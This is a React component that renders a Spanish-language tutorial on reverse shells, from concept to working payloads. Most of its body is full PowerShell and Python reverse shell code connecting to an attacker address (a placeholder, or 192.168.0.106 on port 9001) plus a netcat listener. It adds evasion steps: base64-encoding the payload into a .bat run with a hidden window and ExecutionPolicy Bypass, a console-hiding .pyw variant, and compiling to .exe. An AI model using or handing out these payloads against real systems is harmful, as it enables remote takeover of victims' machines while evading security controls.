import React from "react";

import Comand from "../../../Comand";
import Img from "../../../Img";

//Imagenes
import Img_One from "./../../../../sources/imgs/REVERSESHELL/REVERSESHELL_01.png";
import Img_Two from "./../../../../sources/imgs/REVERSESHELL/REVERSESHELL_02.png";
import Img_Three from "./../../../../sources/imgs/REVERSESHELL/REVERSESHELL_03.png";
import Img_Four from "./../../../../sources/imgs/REVERSESHELL/REVERSESHELL_04.png";
import Img_Five from "./../../../../sources/imgs/REVERSESHELL/REVERSESHELL_05.png";
import Img_Six from "./../../../../sources/imgs/REVERSESHELL/REVERSESHELL_06.png";

import icon_directory_pink from "./../../../../sources/icons/icon-directory-pink.svg";
import icon_directory from "./../../../../sources/icons/icon-directory.svg";

export default function REVERSESHELLS (props) {
    return (
        <>
            <h3 className="span-blue">
                <img className="icon-subtitle" src={icon_directory_pink} alt=""/>
                <span className="span-pink"> REVERSE SHELLS.<span className="span-pink cursor">_</span>
                </span>
            </h3>

            <h3 className="span-blue">
                <img className="icon-subtitle" src={icon_directory} alt=""/>
                <span className="span-blue"> Introducción a los Reverse Shells.<span className="span-blue cursor">_</span>
                </span>
            </h3>

            <p>
                Un <span className="span-yellow">Reverse Shell</span> es una <span className="span-pink">técnica utilizada</span> para <span className="span-white">establecer una conexión remota</span> entre un <span className="span-blue">sistema comprometido</span> y un <span className="span-blue">atacante</span>. A diferencia de una <span className="span-white">shell tradicional</span> <i className="span-white">(bind shell)</i>, en la <span className="span-yellow">Reverse Shell</span> es la <span className="span-blue">víctima</span> quien <span className="span-pink">inicia la conexión</span> hacia el <span className="span-blue">atacante</span>, lo que suele <span className="span-pink">evadir ciertas medidas de seguridad</span> como <span className="span-blue">firewalls</span>.
            </p>

            <h3 className="span-blue">
                <img className="icon-subtitle" src={icon_directory} alt=""/>
                <span className="span-blue"> Funcionamiento general de los Reverse Shells.<span className="span-blue cursor">_</span>
                </span>
            </h3>

            <p>
                El <span className="span-pink">funcionamiento</span> y <span className="span-pink">pasos</span> para realizar un <span className="span-yellow">Reverse Shell</span> se basan en el <span className="span-white">siguiente orden</span>:
            </p>

            <ol className="ol-code">
                <li>
                    <p>
                        La <span className="span-white">máquina víctima</span> <span className="span-pink">ejecuta un código</span> o <span className="span-pink">comando</span> que abre una <span className="span-pink">conexión de red</span> hacia la <span className="span-white">máquina del atacante</span>.
                    </p>
                </li>
                <li>
                    <p>
                        Una vez <span className="span-white">establecida la conexión</span>, el <span className="span-pink">atacante</span> obtiene <span className="span-white">acceso al sistema</span> de la <span className="span-pink">víctima</span> a través de una <span className="span-blue">consola</span> o <span className="span-blue">terminal</span>.
                    </p>
                </li>
                <li>
                    <p>
                        Esta <span className="span-pink">conexión</span> permite <span className="span-white">ejecutar comandos de forma remota</span>, <span className="span-blue">muchas veces</span> con los <span className="span-white">mismos privilegios</span> del <span className="span-white">proceso comprometido</span>.
                    </p>
                </li>
            </ol>

            <h3 className="span-blue">
                <img className="icon-subtitle" src={icon_directory} alt=""/>
                <span className="span-blue"> Componentes involucrados en un Reverse Shell.<span className="span-blue cursor">_</span>
                </span>
            </h3>

            <p>
                Para que una <span className="span-yellow">Reverse Shell</span> pueda llevarse a cabo, se necesita la <span className="span-pink">inclusión</span> de los <span className="span-white">componentes basicos</span>:
            </p>

            <ul className="ol-code">
                <li>
                    <p>
                        <span className="span-white">Máquina Víctima	</span> <span className="span-blue">-></span> <span className="span-pink">Sistema comprometido que lanza la conexión.</span>
                    </p>
                </li>
                <li>
                    <p>
                        <span className="span-white">Atacante (Listener) </span><span className="span-blue">-></span> <span className="span-pink">Dispositivo que espera (escucha) la conexión entrante.</span>
                    </p>
                </li>
                <li>
                    <p>
                        <span className="span-white">Listener</span> <span className="span-blue">-></span> <span className="span-pink">Herramienta como nc, msfconsole o ncat que espera una conexión.</span>
                    </p>
                </li>
                <li>
                    <p>
                        <span className="span-white">Shell remota</span> <span className="span-blue">-></span> <span className="span-pink">Interfaz desde donde el atacante ejecuta comandos.</span>
                    </p>
                </li>
            </ul>

            <h3 className="span-blue">
                <img className="icon-subtitle" src={icon_directory} alt=""/>
                <span className="span-blue"> Reverse Shells.<span className="span-blue cursor">_</span>
                </span>
            </h3>

            <p>
                A <span className="span-white">continuación</span>, se presentan algunos <span className="span-white">códigos utiles</span> y sus <span className="span-pink">explicaciones</span> para la realización de <span className="span-yellow">Reverse Shells</span>:
            </p>

            <b>
                <p className="span-blue">
                    1. Reverse Shell con Powershell.
                </p>
            </b>

            <p>
                Algunas <span className="span-yellow">Reverse Shells</span> pueden ser ejecutadas directamente en <span className="span-white">consola</span> de <span className="span-blue">Powershell</span>:
            </p>

            <p>
                Un <span className="span-pink">ejemplo</span> de <span className="span-white">código a ejecutarse</span> desde la <span className="span-pink">maquina victima</span>:
            </p>

            <Comand
                funcionNotificacion={props.funcionNotificacion}
                notifications={props.notifications}
                code={`$A = New-Object Net.Sockets.TCPClient('<ip-atacante>',<puerto-de-escucha>)
$B = $A.GetStream()
$C = New-Object IO.StreamWriter($B)
$D = New-Object IO.StreamReader($B)
function E($F){$C.Write($F+"SHELL> ");$C.Flush()}
E "Conexión establecida con el host comprometido."
while($true){
    try{
        $G = $D.ReadLine()
        if($G -eq "exit"){E "Conexión cerrada.";break}
        if($G.StartsWith("touch ")){
            $H = $G.Substring(6).Trim()
            try{
                if(Test-Path $H){
                    (Get-Item $H).LastWriteTime=Get-Date
                    $I = "Archivo existente actualizado: $H"
                }else{
                    New-Item -Path $H -ItemType File | Out-Null
                    $I = "Archivo creado: $H"
                }
            }catch{$I = "ERROR: $($_.Exception.Message)"}
        }else{
            $I = try{Invoke-Expression $G 2>&1 | Out-String}catch{"ERROR: $($_.Exception.Message)"}
        }
        E $I
    }catch{E "ERROR: No se pudo leer el comando."}
}
$C.Close();$D.Close();$B.Close()
`}
            />

            <p>
                Donde, desde nuestra <span className="span-pink">maquina atacante</span>, esperamos la <span className="span-white">conexión</span>, colocandonos en <span className="span-pink">modo de escucha</span>.
            </p>

            <p>
                Colocando el <span className="span-pink">comando</span>:
            </p>

            <Comand
                funcionNotificacion={props.funcionNotificacion}
                notifications={props.notifications}
                code={`sudo nc -lvnp <puerto-de-escucha>`}
            />

            <p>
                <span className="span-yellow">Nota:</span> No olvides que el <span className="span-white">puerto de escucha</span> desde el cual esperaremos en nuestro <span className="span-blue">sistema atacante</span>, debe ser el mismo colocado en la <span className="span-yellow">Reverse Shell</span> de la <span className="span-blue">victima</span>.
            </p>

            <p>
                Vizualisandose:
            </p>

            <Img
                img = {Img_One}
                alt = {"Imagen 1. REVERSE SHELL DESDE POWERSHELL."}
                title = {"Descripción de imagen."}
                text = {"1. Ejecución de Reverse Shell desde Power Shell en maquina victima."}
            />

            <Img
                img = {Img_Two}
                alt = {"Imagen 1. REVERSE SHELL DESDE POWERSHELL."}
                title = {"Descripción de imagen."}
                text = {"2. Obtención de Shell Remota desde maquina atacante."}
            />

            <p>
                <span className="span-yellow">Nota:</span> Las <span className="span-white">conexiones</span> desde <span className="span-pink">Reverse Shells</span> suelen <span className="span-white">ocultarse en códigos complejos de ser entendidos</span>, con la finalidad de <span className="span-white">no ser detectados por métodos de seguridad</span>. A este <span className="span-pink">método</span> se le llama <i className="span-blue">"ofuscación"</i>.
            </p>

            <b>
                <p className="span-blue">
                    2. Reverse Shell con Powershell desde archivo (<i className="span-blue">.ps1</i>).
                </p>
            </b>

            <p>
                Tambien podemos ejecutar una <span className="span-yellow">Reverse Shell</span> desde un <span className="span-white">archivo</span> con <span className="span-white">código guardado</span>.
            </p>

            <p>
                Tomando como base nuestra <span className="span-blue">Reverse Shell anterior</span> la cual era ejecutada desde la <span className="span-blue">terminal PowerShell</span>, lo convertiremos en un <i className="span-white">archivo</i>.
            </p>

            <p>
                Para ello, realizaremos los <span className="span-pink">siguientes pasos</span>:
            </p>

            <ol className="ol-code">
                <li>
                    <p>
                        <span className="span-pink">Crea</span> un <span className="span-blue">archivo nuevo</span> con extension <i className="span-white">.ps1</i>.
                    </p>
                </li>
                <li>
                    <p>
                        <span className="span-pink">Ingresa</span> el <span className="span-blue">código de la Reverse Shell</span> dentro del archivo <i className="span-white">.ps1</i>.
                    </p>
                </li>
            </ol>

            <p>
                Para la <span className="span-pink">ejecución del archivo</span>, basta con ejecutar el <span className="span-white">comando siguiente</span> desde una pestaña de <span className="span-blue">terminal PowerShell</span>:
            </p>

            <Comand
                funcionNotificacion={props.funcionNotificacion}
                notifications={props.notifications}
                code={`powershell -ExecutionPolicy Bypass -File <ruta-y-archivo-revershell>.ps1`}
            />

            <p>
                <span className="span-yellow">Nota:</span> No olvidemos colocarnos antes en <span className="span-blue">modo de escucha</span> en el <span className="span-white">puerto definido</span>, desde nuestra <span className="span-pink">maquina atacante</span>.
            </p>

            <p>
                Con el <span className="span-pink">comando siguiente</span>:
            </p>

            <Comand
                funcionNotificacion={props.funcionNotificacion}
                notifications={props.notifications}
                code={`sudo nc -lvnp <puerto-de-escucha>`}
            />

            <p>
                Realizandose como <span className="span-white">ejemplo</span>:
            </p>

            <Img
                img = {Img_Three}
                alt = {"Imagen 3. REVERSE SHELL DESDE ARCHIVO .PS1 EN POWERSHELL."}
                title = {"Descripción de imagen."}
                text = {"3. Comando de reverse shell con archivo .ps1."}
            />

            <Img
                img = {Img_Four}
                alt = {"Imagen 4. REVERSE SHELL DESDE ARCHIVO .PS1 EN POWERSHELL."}
                title = {"Descripción de imagen."}
                text = {"4. Obtención de Shell Remota desde maquina atacante con archivo .ps1."}
            />

            <b>
                <p className="span-blue">
                    3. Reverse Shell con Powershell desde archivo con contenido hasheado (<i className="span-blue">.bat</i>).
                </p>
            </b>

            <p>
                Una manera aun más segura de <span className="span-blue">ofuscar</span> una <span className="span-yellow">Reverse Shell</span> es <span className="span-pink">creando</span> un <span className="span-white">archivo de contenido Cifrado</span>.
            </p>

            <p>
                Por <span className="span-white">ejemplo</span>, <span className="span-pink">crear</span> un <span className="span-white">archivo</span> que contenga el <span className="span-blue">código</span> de una <span className="span-yellow">Reverse Shell</span> <span className="span-blue">hasheada</span> por medio de alguna <span className="span-blue">codificación</span>.
            </p>

            <p>
                Veamos como realizarlo, tomando en cuenta nuestro <span className="span-blue">archivo</span> de <span className="span-yellow">Reverse Shell</span> <span className="span-blue">(del punto 2)</span>, creando un <span className="span-white">archivo</span> que ejecute su <span className="span-white">contenido hasheado</span>.
            </p>

            <p>
                <span className="span-yellow">Nota:</span> Para este punto, necesitamos el <span className="span-white">código</span> de la <span className="span-yellow">Reverse Shell</span> en un <span className="span-white">archivo</span> ya creado.
            </p>

            <p>Para ello, debemos <span className="span-pink">realizar</span> los <span className="span-white">siguientes pasos</span>:</p>

            <ol className="ol-code">
                <li>
                    <p>
                        <span className="span-pink">Ejecutar</span> desde <span className="span-blue">nuestra terminal Powershell</span>, los <span className="span-white">siguientes comandos</span>:
                    </p>
                </li>

                <Comand
                    funcionNotificacion={props.funcionNotificacion}
                    notifications={props.notifications}
                    code={`$script = Get-Content -Path "<ruta-archivo-reverseshell>.ps1" | Out-String`}
                />

                <Comand
                    funcionNotificacion={props.funcionNotificacion}
                    notifications={props.notifications}
                    code={`$bytes = [System.Text.Encoding]::Unicode.GetBytes($script)`}
                />

                <Comand
                    funcionNotificacion={props.funcionNotificacion}
                    notifications={props.notifications}
                    code={`$encodedCommand = [Convert]::ToBase64String($bytes)`}
                />

                <Comand
                    funcionNotificacion={props.funcionNotificacion}
                    notifications={props.notifications}
                    code={`$encodedCommand`}
                />

                <p>
                    Donde <span className="span-white">&lt;ruta-archivo-reverseshell&gt;</span>, significa la <span className="span-blue">ruta</span> y <span className="span-blue">nombre</span> del archivo <i className="span-white">.ps1</i>.
                </p>

                <p>
                    <span className="span-yellow">Nota:</span> Esto devolverá un <span className="span-white">texto hasheado</span> en <span className="span-white">base 64</span>.
                </p>

                <p>
                    <span className="span-white">Ejemplo:</span>
                </p>

                <Img
                    img = {Img_Five}
                    alt = {"Imagen 5. OBTENCIÓN DE CÓDIGO HASHEADO PARA ARCHIVO .BAT."}
                    title = {"Descripción de imagen."}
                    text = {"5. Obtención de código hasheado de .ps1 para nuevo archivo .bat."}
                />

                <li>
                    <p>
                        <span className="span-pink">Copiar</span> el <span className="span-white">hash devuelto</span>.
                    </p>
                </li>

                <li>
                    <p>
                        <span className="span-pink">Crear</span> un <span className="span-white">archivo nuevo</span>, con <span className="span-blue">extension</span> <i className="span-white">.bat</i>.
                    </p>
                </li>

                <li>
                    <p>
                        <span className="span-pink">Colocar</span> en el archivo <i className="span-white">.bat</i>, el <span className="span-blue">siguiente contenido</span>:
                    </p>
                </li>

                <Comand
                    funcionNotificacion={props.funcionNotificacion}
                    notifications={props.notifications}
                    code={`@echo off
powershell -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand <tu-cadena-base64>`}
                />
            </ol>
            
            <p>
                Donde <span className="span-white">&lt;tu-cadena-base64&gt;</span> debe colocarse el <span className="span-blue">hash copiado</span> anteriormente <i className="span-blue">(en el punto 2)</i>.
            </p>

            <p><span className="span-white">Ejemplo:</span></p>
            
            <Img
                img = {Img_Six}
                alt = {"Imagen 5. OCREACION DE ARCHIVO .BAT CON CÓDIGO HASHEADO."}
                title = {"Descripción de imagen."}
                text = {"5. Creacion de archivo .bat con código hasheado."}
            />
            
            <p>
                Una vez realizados los <span className="span-pink">pasos anteriores</span>, podemos ejecutar nuestro <span className="span-blue">archivo</span> <i className="span-white">.bat</i>. 
            </p>

            <p>
                <span className="span-yellow">Nota:</span> No olvidemos <span className="span-pink">colocarnos</span> en <span className="span-white">modo de escucha</span> desde nuestra <span className="span-pink">maquina atacante</span> antes de ejecutar el <i className="span-white">.bat</i> (la <span className="span-blue">dirección ip</span> y <span className="span-blue">puerto de escucha</span> debe ser definido antes de realizar el hash del <span className="span-blue">punto 1</span>, dentro del <i className="span-white">.ps1</i> a utilizar).
            </p>
            
            <p>
                <span className="span-yellow">Nota:</span> Un <span className="span-white">archivo</span> de extensión <i className="span-white">.bat</i> puede ser <span className="span-pink">ejecutado</span>, realizando un doble click sobre el archivo en nuestro <span className="span-blue">explorador de archivos</span>.
            </p>

            <p>
                <span className="span-yellow">Nota:</span> El <span className="span-blue">archivo</span> <i className="span-white">.bat</i> ejecuta en si mismo el <span className="span-white">codigo hasheado</span>. por lo que no necesita el <i className="span-white">.ps1</i> para <span className="span-pink">ejecutarse</span>.
            </p>

            {/* <p>
                Veamos un <span className="span-white">ejemplo de realizar</span>:
            </p>

            <Img
                img = {Img_One}
                alt = {"Imagen 1. REVERSE SHELL DESDE POWERSHELL."}
                title = {"Descripción de imagen."}
                text = {"1. Comando de versión de HASHID."}
            /> */}

            <b>
                <p className="span-blue">
                    4. Reverse Shell con Python.
                </p>
            </b>

            <p>
                Otro tipo de <span className="span-yellow">Reverse Shells</span> puede ser uno <span className="span-pink">ejecutado</span> por medio de <span className="span-white">lenguajes de programción</span> los cuales permitan la <span className="span-blue">ejecución de comandos</span> y <span className="span-blue">acciones dentro de un equipo</span>.
            </p>

            <p>
                Uno de estos <span className="span-white">lenguajes de programación</span> más utilizados para este tipo de <span className="span-pink">funcionalidades</span> es <span className="span-yellow">Python</span>.
            </p>

            <p>
                Veamos un <span className="span-white">ejemplo</span> de <span className="span-pink">código</span> de una <span className="span-yellow">Reverse Shell</span> en <span className="span-yellow">Python</span>:
            </p>

            <Comand
                funcionNotificacion={props.funcionNotificacion}
                notifications={props.notifications}
                code={`import os
import socket
import subprocess
import threading
import ctypes

def s2p(s, p):
    while True:
        try:
            data = s.recv(1024)
            if len(data) > 0:
                p.stdin.write(data.decode('utf-8') + "")
                p.stdin.flush()
        except:
            break

def p2s(s, p):
    while True:
        try:
            s.send(p.stdout.read(1).encode('utf-8'))
        except:
            break

# Ocultar la ventana de la consola en Windows
def hide_console():
    kernel32 = ctypes.windll.kernel32
    user32 = ctypes.windll.user32
    hWnd = kernel32.GetConsoleWindow()
    if hWnd:
        user32.ShowWindow(hWnd, 0)  # 0 = SW_HIDE

# Llamar a la función para ocultar la ventana
hide_console()

# Configura la conexión del reverse shell
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect(("192.168.0.106", 9001))  #IP y puerto del atacante


# Cambiamos "cmd" por "powershell" para usar PowerShell en Windows
p = subprocess.Popen(
    ["powershell"], 
    stdout=subprocess.PIPE, 
    stderr=subprocess.STDOUT, 
    stdin=subprocess.PIPE, 
    text=True
)

# Inicia los hilos para enviar y recibir datos
s2p_thread = threading.Thread(target=s2p, args=(s, p))
s2p_thread.daemon = True
s2p_thread.start()

p2s_thread = threading.Thread(target=p2s, args=(s, p))
p2s_thread.daemon = True
p2s_thread.start()

try:
    p.wait()
except KeyboardInterrupt:
    s.close()`}
            />

            <p>
                Los <span className="span-white">códigos</span> en lenguaje <span className="span-yellow">python</span> son <span className="span-pink">ejecutados</span> desde un <span className="span-white">archivo</span> de extensión <i className="span-white">.py</i>. 
            </p>

            <p>
                <span className="span-yellow">Nota:</span> Para la <span className="span-pink">ejecución</span> de <span className="span-blue">archivos</span> <i className="span-white">.py</i>, es necesario tener <span className="span-pink">instalado</span> el <span className="span-white">lenguaje</span> dentro de la <span className="span-pink">maquina victima</span>, eso hace que este tipo de <span className="span-yellow">Reverse Shells</span> tenga sus <span className="span-blue">contratiempos</span>.
            </p>

            <b>
                <p className="span-blue">
                    5. Reverse Shell con Python (con archivo <i className="span-blue">.pyw</i>).
                </p>
            </b>

            <p>
                Una <span className="span-pink">variante mejorada</span> de una <span className="span-yellow">Reverse Shell</span> desde un archivo <i className="span-white">.py</i> es una  mejora a un archivo <i className="span-white">.pyw</i>.
            </p>

            <p>
                A diferencia de un <span className="span-blue">archivo</span> <i className="span-white">.py</i>, los <span className="span-blue">archivos</span> <i className="span-white">.pyw</i>:
            </p>
            
            <ul className="ol-code">
                <li>
                    <p>
                        <span className="span-white">No abre consola</span> al <span className="span-pink">ejecutarse</span> en <span className="span-blue">Windows</span>.
                    </p>
                </li>
                <li>
                    <p>
                        El <span className="span-white">código</span> se ejecuta en <span className="span-pink">segundo plano</span> o solo muestra una <span className="span-blue">interfaz gráfica</span>.
                    </p>
                </li>
            </ul>

            <p>
                El <span className="span-white">código</span> dentro del <span className="span-blue">archivo</span> <i className="span-white">.pyw</i> es <span className="span-pink">similar al anterior</span>, o <span className="span-blue">bien</span>:
            </p>

            <Comand
                funcionNotificacion={props.funcionNotificacion}
                notifications={props.notifications}
                code={`import os
import socket
import subprocess
import threading
import ctypes

def s2p(s, p):
    while True:
        try:
            data = s.recv(1024)
            if len(data) > 0:
                p.stdin.write(data.decode('utf-8') + "")
                p.stdin.flush()
        except:
            break

def p2s(s, p):
    while True:
        try:
            s.send(p.stdout.read(1).encode('utf-8'))
        except:
            break

# Ocultar la ventana de la consola en Windows
def hide_console():
    kernel32 = ctypes.windll.kernel32
    user32 = ctypes.windll.user32
    hWnd = kernel32.GetConsoleWindow()
    if hWnd:
        user32.ShowWindow(hWnd, 0)  # 0 = SW_HIDE

# Llamar a la función para ocultar la ventana
hide_console()

# Configurar la conexión del reverse shell
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.106", 9001))  # IP y puerto del atacante

# Cambiar "cmd" por "powershell" y usar SW_HIDE para que sea invisible
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW  # Ocultar la ventana del proceso

p = subprocess.Popen(
    ["powershell"],
    stdout=subprocess.PIPE,
    stderr=subprocess.STDOUT,
    stdin=subprocess.PIPE,
    text=True,
    startupinfo=startupinfo  # Pasar la configuración de inicio
)

# Inicia los hilos para enviar y recibir datos
s2p_thread = threading.Thread(target=s2p, args=(s, p))
s2p_thread.daemon = True
s2p_thread.start()

p2s_thread = threading.Thread(target=p2s, args=(s, p))
p2s_thread.daemon = True
p2s_thread.start()

try:
    p.wait()
except KeyboardInterrupt:
    s.close()`}
            />

            <p>
                <span className="span-yellow">Nota:</span> los archivos <i className="span-white">.py</i> y los <i className="span-white">.pyw</i> se ejecutan del <span className="span-pink">mismo modo</span>. 
            </p>

            <h3 className="span-blue">
                <img className="icon-subtitle" src={icon_directory} alt=""/>
                <span className="span-blue">Páginas de Reverse Shells.<span className="span-blue cursor">_</span>
                </span>
            </h3>

            <p>
                Existen <span className="span-white">paginas</span> desde las cuales podemos obtener algunas <span className="span-yellow">Reverse Shells</span> en otros diferentes <span className="span-blue">lenguajes</span> y <span className="span-blue">shells</span>.
            </p>

            <p>
                Podemos basarnos de ellos para la <span className="span-pink">generación</span> de nuestros propias <span className="span-yellow">Reverse Shells</span>.
            </p>

            <p>
                Algunas de estas <span className="span-white">páginas</span> son:
            </p>

            <Comand
                funcionNotificacion={props.funcionNotificacion}
                notifications={props.notifications}
                code="https://www.revshells.com/"
            />

            <Comand
                funcionNotificacion={props.funcionNotificacion}
                notifications={props.notifications}
                code="https://indetectables.net/landing/tools/reverse-shell-generator.html"
            />

            <p>
                <span className="span-yellow">Nota:</span> <span className="span-pink">Recuerda</span>, despues de tener un <span className="span-white">archivo</span> de <spasn className="span-blue">respectivo lenguaje</spasn>, podemos generar un <i className="span-white">.exe</i> para <span className="span-pink">ejecutarse por si mismo</span>.
            </p>
        </>
    );
}